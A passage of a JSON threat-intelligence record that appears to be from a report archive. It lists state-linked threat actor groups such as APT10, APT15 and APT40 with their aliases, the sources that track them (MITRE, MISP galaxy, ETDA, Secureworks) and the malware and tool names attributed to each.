"TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1aead86d-0c57-4e3b-b464-a69f6de20cde", "created_at": "2023-01-06T13:46:38.318176Z", "updated_at": "2026-04-10T02:00:02.925424Z", "deleted_at": null, "main_name": "DAGGER PANDA", "aliases": [ "UAT-7290", "Red Foxtrot", "IceFog", "RedFoxtrot", "Red Wendigo", "PLA Unit 69010" ], "source_name": "MISPGALAXY:DAGGER PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "866c0c21-8de3-4ad5-9887-cecd44feb788", "created_at": "2022-10-25T16:07:24.130298Z", "updated_at": "2026-04-10T02:00:04.875929Z", "deleted_at": null, "main_name": "Roaming Tiger", "aliases": [ "Bronze Woodland", "CTG-7273", "Rotten Tomato" ], "source_name": "ETDA:Roaming Tiger", "tools": [ "Agent.dhwf", "AngryRebel", "BBSRAT", "Destroy RAT", "DestroyRAT", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e", "created_at": "2022-10-25T15:50:23.453824Z", "updated_at": "2026-04-10T02:00:05.28793Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "Ke3chang", "APT15", "Vixen Panda", "GREF", "Playful Dragon", "RoyalAPT", "Nylon Typhoon" ], "source_name": "MITRE:Ke3chang", "tools": [ "Okrum", "Systeminfo", "netstat", "spwebmember", "Mimikatz", "Tasklist", "MirageFox", "Neoichor", "ipconfig" ], "source_id": "MITRE", "reports": null }, { "id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea", "created_at": "2023-01-06T13:46:38.745572Z", "updated_at": "2026-04-10T02:00:03.086207Z", "deleted_at": null, "main_name": "APT40", "aliases": [ "ATK29", "Red Ladon", "MUDCARP", "ISLANDDREAMS", "TEMP.Periscope", "KRYPTONITE PANDA", "G0065", "TA423", "ITG09", "Gingham Typhoon", "TEMP.Jumper", "BRONZE MOHAWK", "GADOLINIUM" ], "source_name": "MISPGALAXY:APT40", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "7f177406-ec53-4a0e-83b8-9876130c9e73", "created_at": "2024-08-28T02:02:09.350152Z", "updated_at": "2026-04-10T02:00:04.69275Z", "deleted_at": null, "main_name": "APT9", "aliases": [], "source_name": "ETDA:APT9", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "699b7efc-322d-489d-818d-823fac028124", "created_at": "2023-01-06T13:46:39.404825Z", "updated_at": "2026-04-10T02:00:03.315524Z", "deleted_at": null, "main_name": "APT9", "aliases": [ "NIGHTSHADE PANDA", "Red Pegasus", "Group 27" ], "source_name": "MISPGALAXY:APT9", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5d9dfc61-6138-497a-b9da-33885539f19c", "created_at": "2022-10-25T16:07:23.720008Z", "updated_at": "2026-04-10T02:00:04.726002Z", "deleted_at": null, "main_name": "Icefog", "aliases": [ "ATK 23", "Dagger Panda", "Icefog", "Red Wendigo" ], "source_name": "ETDA:Icefog", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Dagger Three", "Fucobha", "Icefog", "Javafog", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "83025f5e-302e-46b0-baf6-650a4d313dfc", "created_at": "2024-05-01T02:03:07.971863Z", "updated_at": "2026-04-10T02:00:03.743131Z", "deleted_at": null, "main_name": "BRONZE MOHAWK", "aliases": [ "APT40 ", "GADOLINIUM ", "Gingham Typhoon ", "Kryptonite Panda ", "Leviathan ", "Nanhaishu ", "Pickleworm ", "Red Ladon ", "TA423 ", "Temp.Jumper ", "Temp.Periscope " ], "source_name": "Secureworks:BRONZE MOHAWK", "tools": [ "AIRBREAK", "BlackCoffee", "China Chopper", "Cobalt Strike", "DadJoke", "Donut", "FUSIONBLAZE", "GreenCrash", "Meterpreter", "Nanhaishu", "Orz", "SeDll" ], "source_id": "Secureworks", "reports": null }, { "id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a", "created_at": "2022-10-25T15:50:23.481057Z", "updated_at": "2026-04-10T02:00:05.306469Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon" ], "source_name": "MITRE:Leviathan", "tools": [ "Windows Credential Editor", "BITSAdmin", "HOMEFRY", "Derusbi", "at", "BLACKCOFFEE", "BADFLICK", "gh0st RAT", "PowerSploit", "MURKYTOP", "NanHaiShu", "Orz", "Cobalt Strike", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", "UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null }, { "id": "7d5531e2-0ad1-4237-beed-af009035576f", "created_at": "2024-05-01T02:03:07.977868Z", "updated_at": "2026-04-10T02:00:03.817883Z", "deleted_at": null, "main_name": "BRONZE PALACE", "aliases": [ "APT15 ", "BRONZE DAVENPORT ", "BRONZE IDLEWOOD ", "CTG-6119 ", "CTG-6119 ", "CTG-9246 ", "Ke3chang ", "NICKEL ", "Nylon Typhoon ", "Playful Dragon", "Vixen Panda " ], "source_name": "Secureworks:BRONZE PALACE", "tools": [ "BMW", "BS2005", "Enfal", "Mirage", "RoyalCLI", "RoyalDNS" ], "source_id": "Secureworks", "reports": null }, { "id": "7c8cf02c-623a-4793-918b-f908675a1aef", "created_at": "2023-01-06T13:46:38.309165Z", "updated_at": "2026-04-10T02:00:02.921721Z", "deleted_at": null, "main_name": "APT15", "aliases": [ "Metushy", "Lurid", "Social Network Team", "Royal APT", "BRONZE DAVENPORT", "BRONZE IDLEWOOD", "VIXEN PANDA", "Ke3Chang", "Playful Dragon", "BRONZE PALACE", "G0004", "Red Vulture", "Nylon Typhoon" ], "source_name": "MISPGALAXY:APT15", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5afe7b81-e99a-4c24-8fcc-250fb0cf40a3", "created_at": "2023-01-06T13:46:38.324616Z", "updated_at": "2026-04-10T02:00:02.928697Z", "deleted_at": null, "main_name": "Roaming Tiger", "aliases": [ "BRONZE WOODLAND", "Rotten Tomato" ], "source_name": "MISPGALAXY:Roaming Tiger", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7d553b83-a7b2-431f-9bc9-08da59f3c4ea", "created_at": "2023-01-06T13:46:39.444946Z", "updated_at": "2026-04-10T02:00:03.331753Z", "deleted_at": null, "main_name": "GOBLIN PANDA", "aliases": [ "Conimes", "Cycldek" ], "source_name": "MISPGALAXY:GOBLIN PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee9a20b1-c6d6-42da-909d-66e7699723d1", "created_at": "2025-08-07T02:03:24.704306Z", "updated_at": "2026-04-10T02:00:03.722506Z", "deleted_at": null, "main_name": "BRONZE WOODLAND", "aliases": [ "CTG-7273 ", "Roaming Tiger ", "Rotten Tomato " ], "source_name": "Secureworks:BRONZE WOODLAND", "tools": [ "Appat", "BbsRAT", "PlugX", "Zbot" ], "source_id": "Secureworks", "reports": null }, { "id": "2c7ecb0e-337c-478f-95d4-7dbe9ba44c39", "created_at": "2022-10-25T16:07:23.690871Z", "updated_at": "2026-04-10T02:00:04.709966Z", "deleted_at": null, "main_name": "Goblin Panda", "aliases": [ "1937CN", "Conimes", "Cycldek", "Goblin Panda" ], "source_name": "ETDA:Goblin Panda", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Agent.dhwf", "BackDoor-FBZT!52D84425CDF2", "BlueCore", "BrowsingHistoryView", "ChromePass", "CoreLoader", "Custom HDoor", "Destroy RAT", "DestroyRAT", "DropPhone", "FoundCore", "HDoor", "HTTPTunnel", "JsonCookies", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "NBTscan", "NewCore RAT", "PlugX", "ProcDump", "PsExec", "QCRat", "RainyDay", "RedCore", "RedDelta", "RoyalRoad", "Sisfader", "Sisfader RAT", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Win32.Staser.ytq", "USBCulprit", "Win32/Zegost.BW", "Xamtrav", "ZeGhost", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c", "created_at": "2022-10-25T16:07:23.750796Z", "updated_at": "2026-04-10T02:00:04.736762Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "APT 15", "BackdoorDiplomacy", "Bronze Davenport", "Bronze Idlewood", "Bronze Palace", "CTG-9246", "G0004", "G0135", "GREF", "Ke3chang", "Metushy", "Nylon Typhoon", "Operation Ke3chang", "Operation MirageFox", "Playful Dragon", "Playful Taurus", "PurpleHaze", "Red Vulture", "Royal APT", "Social Network Team", "Vixen Panda" ], "source_name": "ETDA:Ke3chang", "tools": [ "Agentemis", "Anserin", "BS2005", "BleDoor", "CarbonSteal", "Cobalt Strike", "CobaltStrike", "DarthPusher", "DoubleAgent", "EternalBlue", "GoldenEagle", "Graphican", "HenBox", "HighNoon", "IRAFAU", "Ketrican", "Ketrum", "LOLBAS", "LOLBins", "Living off the Land", "MS Exchange Tool", "Mebroot", "Mimikatz", "MirageFox", "NBTscan", "Okrum", "PluginPhantom", "PortQry", "ProcDump", "PsList", "Quarian", "RbDoor", "RibDoor", "Royal DNS", "RoyalCli", "RoyalDNS", "SAMRID", "SMBTouch", "SilkBean", "Sinowal", "SpyWaller", "Theola", "TidePool", "Torpig", "Turian", "Winnti", "XSLCmd", "cobeacon", "nbtscan", "netcat", "spwebmember" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434307, "ts_updated_at": 1775792274, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.pdf", "text": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.txt", "img": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.jpg" } }